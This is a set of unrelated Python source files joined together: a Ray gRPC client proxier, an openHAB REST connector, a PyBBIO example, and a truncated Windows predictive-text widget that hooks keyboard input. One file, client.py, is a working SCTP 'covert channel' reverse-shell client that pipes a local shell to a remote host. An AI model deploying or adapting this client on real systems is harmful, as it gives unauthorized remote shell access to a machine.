client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
return getattr(stub, method)(
request, metadata=[("client_id", client_id)])
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def PrepRuntimeEnv(self, request,
context=None) -> ray_client_pb2.PrepRuntimeEnvResponse:
return self._call_inner_function(request, context, "PrepRuntimeEnv")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
return self._call_inner_function(request, context, "KVPut")
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
return self._call_inner_function(request, context, "KVGet")
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
return self._call_inner_function(request, context, "KVGet")
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
return self._call_inner_function(request, context, "KVList")
def KVExists(self, request,
context=None) -> ray_client_pb2.KVExistsResponse:
return self._call_inner_function(request, context, "KVExists")
def ClusterInfo(self, request,
context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue with connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(self, request: ray_client_pb2.PutRequest,
context=None) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(init_request: ray_client_pb2.DataRequest
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", ("Received initial message of type "
f"{init_type}, not 'init'.")
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config))
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
def modify_connection_info_resp(self,
init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
        Modify the `num_clients` returned in the ConnectionInfoResponse,
        because individual SpecificServers only have **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
try:
with self.clients_lock:
self.num_clients += 1
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
try:
modified_init_req, job_config = prepare_runtime_init_req(
init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!")
raise RuntimeError(
"Starting up Server Failed! Check "
"`ray_client_server.err` on the cluster.")
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` on the cluster.")
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()))
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
resp_stream = stub.Datapath(
new_iter, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield self.modify_connection_info_resp(resp)
finally:
server.set_result(None)
with self.clients_lock:
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
        # We need to retry a few times because the LogClient *may* connect
        # before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(
f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield resp
def serve_proxier(connection_str: str,
redis_address: str,
session_dir: Optional[str] = None):
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS)
proxy_manager = ProxyManager(redis_address, session_dir)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
logs_servicer, server)
server.add_insecure_port(connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
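# Minimal usage sketch for serve_proxier (hypothetical wiring; the addresses
# below are placeholders, not values defined by this module):
#
#     handle = serve_proxier("0.0.0.0:10001", "127.0.0.1:6379",
#                            session_dir="/tmp/ray/session_latest")
#     try:
#         handle.grpc_server.wait_for_termination()
#     finally:
#         handle.grpc_server.stop(grace=1)
#
# serve_proxier starts the gRPC server before returning, so a caller only needs
# to keep the returned ClientServerHandle alive and stop it on shutdown.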
|
client.py
|
#!/usr/bin/python2
import argparse
from Crypto.Cipher import AES
import fcntl
import os
import pty
import sctp
import socket
import ssl
import sys
from subprocess import Popen, PIPE
import threading
sctp_socket = sctp.sctpsocket_tcp
# DISCLAIMER: this code is largely copied and refactored from gallopsled's excellent pwntools.
# Hat tip to them.
def interactive_recv_input(sock, std_in, bye_bye):
while not bye_bye.isSet():
# receive data and give it to the program's input:
try:
cur_data = sock.recv(1024)
if cur_data:
std_in.write(cur_data)
std_in.flush()
except EOFError:
print "EOF - terminating"
sys.exit(0)
def interactive_send_output(sock, std_out, bye_bye):
try:
while not bye_bye.isSet():
try:
data = std_out.read()
except IOError:
continue
if data:
try:
sock.send(data)
except (EOFError, socket.error) as e:
print "EOF - terminating"
bye_bye.set()
else:
bye_bye.set()
except KeyboardInterrupt:
print "CTRL + C pressed."
bye_bye.set()
def process_connection(sock, std_in, std_out, disable_encryption = False):
# connect connection's stdin to my stdin, connection's stdout to my stdout.
bye_bye = threading.Event()
read_thread = threading.Thread(target = interactive_recv_input, args = (sock, std_in, bye_bye))
read_thread.setDaemon(True)
read_thread.start()
interactive_send_output(sock, std_out, bye_bye)
while read_thread.is_alive():
read_thread.join(timeout = 0.1)
# END DISCLAIMER
def connect(host, port, disable_encryption = False):
sock = sctp_socket(family = socket.AF_INET)
sock.connect((host, port))
if disable_encryption:
std_out = sock.sock().makefile("w")
std_in = sock.sock().makefile()
shell = Popen(os.environ["SHELL"],
stdin = std_in,
stdout = std_out,
shell = True)
else:
ssl_sock = ssl.wrap_socket(sock.sock(),
ssl_version = ssl.PROTOCOL_TLSv1)
ssl_sock.send("Hi! This is the client. You're connected.\n")
r, w = os.pipe()
std_in = os.fdopen(r, "r")
std_out = os.fdopen(w, "w")
#Set our shell up to use pty, and make the output non-blocking.
master, slave = pty.openpty()
shell = Popen(os.environ["SHELL"],
stdin = PIPE,
stdout = slave,
shell = True)
shell.stdout = os.fdopen(os.dup(master), "r+")
fd = shell.stdout.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
process_connection(ssl_sock, shell.stdin, shell.stdout, disable_encryption)
sock.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = ("SCTP covert channel client. "
"FOR PROFESSIONAL PENTESTING USE ONLY."))
parser.add_argument("--host",
required = True,
help = "Server IP address.")
parser.add_argument("--port",
required = True,
help = "Server port.",
type = int)
parser.add_argument("--no-encryption",
help = "FOR DEBUGGING ONLY. Disables encryption",
action = "store_true")
args = parser.parse_args()
connect(host = args.host, port = args.port, disable_encryption = args.no_encryption)
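# Example invocation (host/port values are placeholders):
#
#     python2 client.py --host 192.0.2.10 --port 5000
#
# Pass --no-encryption only for debugging; it skips the TLS wrapping above.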
|
rest_conn.py
|
# Copyright 2020 Richard Koshak
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Communicator that publishes and subscribes to openHAB's REST API.
Classes:
- openhab_rest: publishes state updates to openHAB Items.
"""
from threading import Thread, Timer
from configparser import NoOptionError
import json
import traceback
import requests
import sseclient
from core.connection import Connection
def connect_oh_rest(caller):
""" Subscribe to SSE events and start processing the events
if API-Token is provided and supported then include it in the request"""
try:
if caller.openhab_version >= 3.0 and bool(caller.api_token):
header = {'Authorization': 'Bearer ' + caller.api_token }
stream = requests.get("{}/rest/events".format(caller.openhab_url),
headers=header, stream=True)
else:
stream = requests.get("{}/rest/events".format(caller.openhab_url),
stream=True)
caller.client = sseclient.SSEClient(stream)
except requests.exceptions.Timeout:
caller.log.error("Timed out connecting to %s", caller.openhab_url)
except requests.exceptions.ConnectionError as ex:
caller.log.error("Failed to connect to %s, response: %s", caller.openhab_url, ex)
except requests.exceptions.HTTPError as ex:
caller.log.error("Received and unsuccessful response code %s", ex)
caller.reciever = OpenhabReciever(caller)
class OpenhabREST(Connection):
"""Publishes a state to a given openHAB Item. Expects there to be a URL
parameter set to the base URL of the openHAB instance. Subscribes to the OH
SSE feed for commands on the registered Items.
"""
def __init__(self, msg_processor, params):
"""Starts the SSE subscription and registers for commands on
RefreshItem. Expects the following params:
- "URL": base URL of the openHAB instance NOTE: does not support TLS.
- "RefreshItem": Name of the openHAB Item that, when it receives a
command will cause sensor_reporter to publish the most recent states of
all the sensors.
- msg_processor: message handler for command to the RefreshItem
"""
super().__init__(msg_processor, params)
self.log.info("Initializing openHAB REST Connection...")
self.openhab_url = params("URL")
self.refresh_item = params("RefreshItem")
self.registered[self.refresh_item] = msg_processor
        # optional openHAB version and optional API token for connections with authentication
try:
self.openhab_version = float(params("openHAB-Version"))
except NoOptionError:
self.log.info("No openHAB-Version specified, falling back to version 2.0")
self.openhab_version = 2.0
if self.openhab_version >= 3.0:
try:
self.api_token = params("API-Token")
except NoOptionError:
self.api_token = ""
if not bool(self.api_token):
self.log.info("No API-Token specified,"
" connecting to openHAB without authentication")
self.client = None
self.reciever = None
connect_oh_rest(self)
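    # A sketch of the configuration this constructor expects from its params
    # callable (hypothetical values; only the four keys read above matter):
    #
    #     URL = http://localhost:8080
    #     RefreshItem = SensorReporter_Refresh
    #     openHAB-Version = 3.0
    #     API-Token = <token generated in openHAB>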
def publish(self, message, destination, filter_echo=False):
"""Publishes the passed in message to the passed in destination as an update.
        Handles filter_echo=True the same way as a normal publish, since
        openHAB won't send a status update back to all subscribers."""
self.reciever.start_watchdog()
try:
self.log.debug("Publishing message %s to %s", message, destination)
# openHAB 2.x doesn't need the Content-Type header
if self.openhab_version < 3.0:
response = requests.put("{}/rest/items/{}/state"
.format(self.openhab_url, destination),
data=message, timeout=10)
else:
# define header for OH3 communication and authentication
header = {'Content-Type': 'text/plain'}
if bool(self.api_token):
header['Authorization'] = "Bearer " + self.api_token
response = requests.put("{}/rest/items/{}/state"
.format(self.openhab_url, destination),
headers=header, data=message, timeout=10)
response.raise_for_status()
self.reciever.activate_watchdog()
except ConnectionError:
self.log.error("Failed to connect to %s\n%s", self.openhab_url,
traceback.format_exc())
except requests.exceptions.Timeout:
self.log.error("Timed out connecting to %s", self.openhab_url)
except requests.exceptions.ConnectionError as ex:
            # handles the "[Errno 111] Connection refused" exception,
            # which is not caught by the "ConnectionError" clause above
self.log.error("Failed to connect to %s, response: %s", self.openhab_url, ex)
except requests.exceptions.HTTPError as ex:
self.log.error("Received and unsuccessful response code %s", ex)
def disconnect(self):
"""Stops the event processing loop."""
self.log.info("Disconnecting from openHAB SSE")
self.reciever.stop()
class OpenhabReciever():
"""Initiates a separate Task for recieving OH SSE.
"""
def __init__(self, caller):
self.stop_thread = False
        # keep a local reference to the caller's SSE client
self.client = caller.client
self.caller = caller
self.watchdog = None
self.watchdog_activ = False
        # in case of a connection error don't start the _get_messages thread
if self.client:
self.thread = Thread(target=self._get_messages, args=(caller,))
self.thread.start()
def _get_messages(self, caller):
"""Blocks until stop is set to True. Loops through all the events on the
SSE subscription and if it's a command to a registered Item, call's that
Item's handler.
"""
for event in self.client.events():
# reset reconnect watchdog
if self.watchdog:
self.watchdog.cancel()
if self.stop_thread:
self.client.close()
caller.log.debug("Old OpenHab connection closed")
return
# See if this is an event we care about. Commands on registered Items.
decoded = json.loads(event.data)
if decoded["type"] == "ItemCommandEvent":
# openHAB 2.x locates the items on a different url
if caller.openhab_version < 3.0:
item = decoded["topic"].replace("smarthome/items/",
"").replace("/command", "")
else:
item = decoded["topic"].replace("openhab/items/",
"").replace("/command", "")
if item in caller.registered:
payload = json.loads(decoded["payload"])
msg = payload["value"]
caller.log.info("Received command from %s: %s", item, msg)
caller.registered[item](msg)
def _wd_timeout(self):
"""watchdog handler: will reconnect to openhab when invoced"""
if self.watchdog_activ:
self.caller.log.info("connection EXPIRED, reconnecting")
self.stop()
connect_oh_rest(self.caller)
def start_watchdog(self):
"""start watchdog before msg gets sent to openhabREST
if the watchdog gets activated and after 2s no msg from openHAB was
received the connection gets reseted
"""
if self.watchdog:
self.watchdog.cancel()
self.watchdog_activ = False
self.watchdog = Timer(2, self._wd_timeout)
self.watchdog.start()
def activate_watchdog(self):
"""enable watchdog after msg was succesful send (no exeption due to connection error)
avoids a reconnect atempt when the connection was unsuccessful
"""
self.watchdog_activ = True
def stop(self):
"""Sets a flag to stop the _get_messages thread and to close the openHAB connection.
        Since the thread itself blocks until a message is received, we don't wait for it.
"""
self.stop_thread = True
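# Watchdog flow, as implemented above: publish() arms a 2-second Timer via
# start_watchdog() before each REST call and marks it live with
# activate_watchdog() once the call succeeds; every SSE event received in
# _get_messages() cancels the pending Timer, so _wd_timeout() only reconnects
# (via connect_oh_rest) when openHAB stops delivering events after a
# successful publish.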
|
SafeProcess_test.py
|
#!/usr/bin/env python
"""
SafeProcess_test.py
Alexander Hiam
An example to demonstrate the use of the SafeProcess library
for PyBBIO.
This example program is in the public domain.
"""
from bbio import *
from bbio.libraries.SafeProcess import *
def foo():
while(True):
print "foo"
delay(1000)
def setup():
p = SafeProcess(target=foo)
p.start()
def loop():
print "loop"
delay(500)
run(setup, loop)
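# Per PyBBIO's documentation, SafeProcess wraps multiprocessing.Process so the
# framework terminates it automatically when the sketch exits, meaning the
# foo() loop above does not outlive run(); that behavior is assumed here rather
# than demonstrated by this example.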
|
echotext.py
|
# echotext Version 1.1 by Neil Flodin
#
# A simple widget that uses predictive text analysis to provide
# user-customized predictive text input, similar to what is now seen
# on many smartphones.
#
# The text of the MIT license is below.
#
#
# Copyright (c) 2015 Neil Flodin <neil@neilflodin.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Tkinter library used for GUI
from tkinter import *
# Specifically import these separate tkinter modules
import tkinter.messagebox
import tkinter.commondialog
'''
# These are used to query Princeton's WordNet for parts of speech in order to make more educated guesses
from bs4 import BeautifulSoup
import requests
import urllib
'''
# For easy, good file IO as well as web interfacing (maybe)
import json
import os
# Windows constants (key codes etc.); monitor information for window placement comes from win32api below
import win32con
'''
# Word part of speech tagging, just a great general-usage natural language processor
import nltk
# Load nltk components
try:
nltk.data.find("taggers/averaged_perceptron_tagger.zip")
except LookupError:
nltk.download("averaged_perceptron_tagger")
try:
nltk.data.find("tokenizers/punkt.zip")
except LookupError:
nltk.download("punkt")
'''
# I <3 multithreading (Used for update_sources_masterobject)
import threading
# Sleep function
import time
# Get file:// URIs
import pathlib
# String splitting
import re
# Keylogging components
import pyHook
# Keyboard entry simulation
import ctypes
import win32api
MAPVK_VK_TO_VSC = 0
MAPVK_VSC_TO_VK = 1
MAPVK_VK_TO_CHAR = 2
MAPVK_VSC_TO_VK_EX = 3
MAPVK_VK_TO_VSC_EX = 4
KLF_ACTIVATE = 1
KLF_SUBSTITUTE_OK = 2
KLF_REORDER = 8
KLF_REPLACELANG = 0x10
KLF_NOTELLSHELL = 0x80
KLF_SETFORPROCESS = 0x00100
KLF_SHIFTLOCK = 0x10000
KLF_RESET = 0x40000000
SendInput = ctypes.windll.user32.SendInput
PUL = ctypes.POINTER(ctypes.c_ulong)
class KeyBdInput(ctypes.Structure):
_fields_ = [("wVk", ctypes.c_ushort),
("wScan", ctypes.c_ushort),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", PUL)]
class HardwareInput(ctypes.Structure):
_fields_ = [("uMsg", ctypes.c_ulong),
("wParamL", ctypes.c_short),
("wParamH", ctypes.c_ushort)]
class MouseInput(ctypes.Structure):
_fields_ = [("dx", ctypes.c_long),
("dy", ctypes.c_long),
("mouseData", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("time",ctypes.c_ulong),
("dwExtraInfo", PUL)]
class Input_I(ctypes.Union):
_fields_ = [("ki", KeyBdInput),
("mi", MouseInput),
("hi", HardwareInput)]
class Input(ctypes.Structure):
_fields_ = [("type", ctypes.c_ulong),
("ii", Input_I)]
def PressKey(hexKeyCode):
extra = ctypes.c_ulong(0)
ii_ = Input_I()
ii_.ki = KeyBdInput( 0, win32api.MapVirtualKey(hexKeyCode, MAPVK_VK_TO_VSC), 0x0008, 0, ctypes.pointer(extra) )
x = Input( ctypes.c_ulong(1), ii_ )
ctypes.windll.user32.SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))
return
def ReleaseKey(hexKeyCode):
extra = ctypes.c_ulong(0)
ii_ = Input_I()
ii_.ki = KeyBdInput( 0, win32api.MapVirtualKey(hexKeyCode, MAPVK_VK_TO_VSC), 0x0008 | win32con.KEYEVENTF_KEYUP, 0, ctypes.pointer(extra) )
x = Input( ctypes.c_ulong(1), ii_ )
ctypes.windll.user32.SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))
return
def SetKeyStateUp(hexKeyCode):
if win32api.GetAsyncKeyState(hexKeyCode) != 0:
ReleaseKey(hexKeyCode)
return
def SetKeyStateDown(hexKeyCode):
if win32api.GetAsyncKeyState(hexKeyCode) == 0:
PressKey(hexKeyCode)
return
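# Summary of the helpers above: PressKey/ReleaseKey synthesize keystrokes with
# SendInput using scan codes (dwFlags 0x0008 is KEYEVENTF_SCANCODE, with
# KEYEVENTF_KEYUP added on release), while SetKeyStateUp/SetKeyStateDown check
# GetAsyncKeyState first so an event is only sent when the key's state actually
# needs to change.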
# Create "sources" directory if it doesn't exist
if not os.path.exists("sources"):
os.makedirs("sources")
# Function to save updated functions on the fly
def save_settings(settingsObj):
settings_file = open("settings.json", "w")
settings_file.write(json.dumps(settingsObj))
settings_file.close()
# Try to load settings file
# If unsuccessful, create one
# Default settings
default_settings = { "keep_window_on_top" : TRUE, "make_window_transparent" : FALSE, "version": "1.1" }
settings = {}
openedFile = {}
fileText = ""
if os.path.isfile(os.path.dirname(os.path.realpath(__file__)) + "/settings.json"):
openedFile = open("settings.json", "r")
fileText = openedFile.read()
# Now try to JSON decode our read file text
try:
settings = json.loads(fileText)
except ValueError:
settings = default_settings
save_settings(default_settings)
else:
openedFile = open("settings.json", "w")
fileText = json.dumps(default_settings)
openedFile.write(fileText)
settings = json.loads(fileText)
openedFile.close()
# Function to save updated sources on the fly
def save_sources(sourcesObj):
sources_file = open("sources.json", "w")
sources_file.write(json.dumps(sourcesObj))
sources_file.close()
return
# Load the list of sources from sources.json
default_sources = { "version" : "1.1", "sources_list" : [] }
sources_list = {}
openedFile = {}
fileText = ""
if os.path.isfile(os.path.dirname(os.path.realpath(__file__)) + "/sources.json"):
openedFile = open("sources.json", "r")
fileText = openedFile.read()
# Try to decode JSON
try:
sources_list = json.loads(fileText)
except ValueError:
sources_list = default_sources
save_sources(default_sources)
else:
openedFile = open("sources.json", "w")
fileText = json.dumps(default_sources)
openedFile.write(fileText)
sources_list = json.loads(fileText)
openedFile.close()
# Create object that is the combination of all loaded sources
source_master_object = {}
# Figure out window dimensions
window_width = 400
window_height = 200
# Figure out starting x-y position on the screen
window_initial_x_offset = win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] - window_width - 100
window_initial_y_offset = win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] - window_height - 100
# Initialize window/root object
root = Tk()
# Set the window's icon
root.tk.call("wm", "iconbitmap", root._w, "-default", "icon.ico")
# Set the window's title too
root.wm_title("echotext")
# Set as non-resizable
root.resizable(width = FALSE, height = FALSE)
# Position the window on the screen
root.geometry(str(window_width) + "x" + str(window_height) + "+" + str(window_initial_x_offset) + "+" + str(window_initial_y_offset))
# Keep the window above all others based on setting
if settings["keep_window_on_top"] == TRUE:
root.wm_attributes("-topmost", "1")
# Set window transparency based on setting
if settings["make_window_transparent"] == TRUE:
root.wm_attributes("-alpha", 0.7)
# Functions for menu bar buttons
def menu_bar_input_button():
# Input button pressed
sources_frame.pack_forget()
input_frame.pack(fill = BOTH, expand = TRUE)
return
def menu_bar_sources_button():
# Sources button pressed
input_frame.pack_forget()
sourceframe_background_clicked( None )
sources_frame.pack(fill = BOTH, expand = TRUE)
return
def menu_bar_add_source_button():
global add_source_dialog, source_text_entry_frame, source_text_entry_field_scrollbar, \
source_text_entry_field, source_meta_entry_frame, source_name_entry_field, source_create_ok_buttton, root
# "Add Source" button pressed
# Create a new top-level dialog window
add_source_dialog = Toplevel()
add_source_dialog.title("Add Source Text")
add_source_dialog.resizable(width = FALSE, height = FALSE)
add_source_dialog.config(background = "black")
add_source_dialog.geometry("640x480+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] / 2) \
- (640 / 2))) + "+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] / 2) - (480 / 2))))
# Format the grid pattern for the encompassing frames
add_source_dialog.grid_rowconfigure(0, weight = 4)
add_source_dialog.grid_rowconfigure(1, weight = 1)
add_source_dialog.grid_columnconfigure(0, weight = 1)
# Create the frame that will house the text material entry field
source_text_entry_frame = Frame(master = add_source_dialog, background = "black")
source_text_entry_frame.grid(row = 0, column = 0, padx = 6, pady = 3)
# Create the frame that will house the name entry field and "OK" button
source_meta_entry_frame = Frame(master = add_source_dialog, background = "black")
source_meta_entry_frame.grid(row = 1, column = 0, padx = 6, pady = 3)
# Create the vertical scrollbar that goes in that text field
source_text_entry_field_scrollbar = Scrollbar(master = source_text_entry_frame)
source_text_entry_field_scrollbar.pack(side = RIGHT, fill = Y)
# Create the text entry field for entering raw text data
source_text_entry_field = Text(master = source_text_entry_frame)
source_text_entry_field.config(wrap = WORD, font = "Arial 12")
source_text_entry_field.insert(CURRENT, "Enter your human-readable text here.")
source_text_entry_field.pack(side = LEFT, expand = TRUE)
# "Attach" the text field and scrollbar to each other
source_text_entry_field_scrollbar.config( command = source_text_entry_field.yview )
source_text_entry_field.config( yscrollcommand = source_text_entry_field_scrollbar.set )
# Format the grid pattern for the meta entry fields
source_meta_entry_frame.grid_rowconfigure(0, weight = 1)
source_meta_entry_frame.grid_columnconfigure(0, weight = 3)
source_meta_entry_frame.grid_columnconfigure(1, weight = 1)
# Create the reference name entry box below the text entry one
source_name_entry_field = Entry(master = source_meta_entry_frame, width = 24)
source_name_entry_field.insert(INSERT, "Source name")
source_name_entry_field.grid(row = 0, column = 0, padx = 6, pady = 3, sticky = N+S+E+W)
# Create the button that will finish the reference creation process
source_create_ok_buttton = Button(master = source_meta_entry_frame, text = "Create Source", command = source_create_ok_clicked)
source_create_ok_buttton.grid(row = 0, column = 1, padx = 6, pady = 3, sticky = N+S+E+W)
add_source_dialog.wm_transient(master = root)
add_source_dialog.focus_set()
add_source_dialog.grab_set()
return
def menu_bar_about_button():
tkinter.messagebox.showinfo("About", "\"EchoText\" version one point one\n\nechotext is released under the MIT license\n\
https://opensource.org/licenses/MIT\n\nDeveloped by Neil Flodin <neil@neilflodin.com>")
return
# Handler functions from the "Add Source" dialog
def source_create_ok_clicked():
global add_source_dialog, source_text_entry_frame, source_text_entry_field_scrollbar, \
source_text_entry_field, source_meta_entry_frame, source_name_entry_field, source_create_ok_buttton
# Trim the whitespace off of the entered name
source_name_entry_field_newname = source_name_entry_field.get().strip()
source_name_entry_field.delete(0, END)
source_name_entry_field.insert(0, source_name_entry_field_newname)
# Check if source name exceeds maximum length
if len( source_name_entry_field_newname ) > 24:
tkinter.messagebox.showerror("Name Too Long", "The name you entered for the new source is over 24 characters long. Shorten it before you continue.")
return
# Check if source name matches an already created name
for source_item in sources_list["sources_list"]:
if source_item["source_name"] == source_name_entry_field_newname:
tkinter.messagebox.showerror("Name Already Used", "There is already a source that has that same name. Please enter another one.")
return
# Check to make sure name is legit for Windows
for character in source_name_entry_field_newname:
        if character in '\\/:*?"<>|':
# Can't use the name
tkinter.messagebox.showerror("Name Invalid", "Source names cannot contain any of the following characters:\n\\/:*?\"<>|\nPlease enter another source name.")
return
# Create a loading screen while the data is added to databases
loading_dialog = Toplevel()
loading_dialog.title("Please wait...")
loading_dialog.resizable(width = FALSE, height = FALSE)
loading_dialog.config(background = "black")
loading_dialog.wm_attributes("-disabled", "1")
loading_dialog.geometry("300x200+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] / 2) \
- (300 / 2))) + "+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] / 2) - (200 / 2))))
loading_dialog_label = Label(loading_dialog, text = "Adding and sorting text into personal database...\nPlease wait...", justify = CENTER, background = "black", foreground = "white")
loading_dialog_label.place(relx = 0.5, rely = 0.5, anchor = CENTER)
loading_dialog.wm_transient(master = root)
loading_dialog.focus_set()
loading_dialog.grab_set()
# Split raw text into sentences
raw_text = source_text_entry_field.get("1.0", END)
    split_sentence_list = re.split(r"[;,.!?:]\s*", raw_text)
empty_sentences_removed_list = []
for chunk in split_sentence_list:
# If, after removing the sentence's whitespace, the sentence is not empty, add it to empty_sentences_removed_list
if chunk.strip() != "":
# Add stripped sentence to new array
empty_sentences_removed_list.append(chunk.strip())
# Now we have an array of every individual sentence
new_source_json_data = { "version" : "1.1", "top_word_list" : {} }
# Do following for every sentence that will be parsed
for sentence_index in range(0, len( empty_sentences_removed_list )):
# Split the sentence into individual words by removing spaces
current_sentence_split = empty_sentences_removed_list[sentence_index].split()
# Do following for every word in the current sentence being parsed
for word_index in range(0, len( current_sentence_split )):
# If a top_word_list word entry doesn't already exist for the current word being parsed, create one
if current_sentence_split[ word_index ] in new_source_json_data["top_word_list"]:
# Increase top-level total_frequency by one
new_source_json_data["top_word_list"][current_sentence_split[ word_index ]]["total_frequency"] += 1
else:
new_source_json_data["top_word_list"][current_sentence_split[ word_index ]] = { "subsequent_words" : [], "total_frequency" : 1 }
# If the word_index isn't 0, that means the current word has a word before it
# We can add this word as a "subsequent_word"
if word_index > 0:
new_subsequent = True
for subseq_listitem_index in range(0, len( new_source_json_data["top_word_list"][current_sentence_split[ word_index - 1 ]]["subsequent_words"] )):
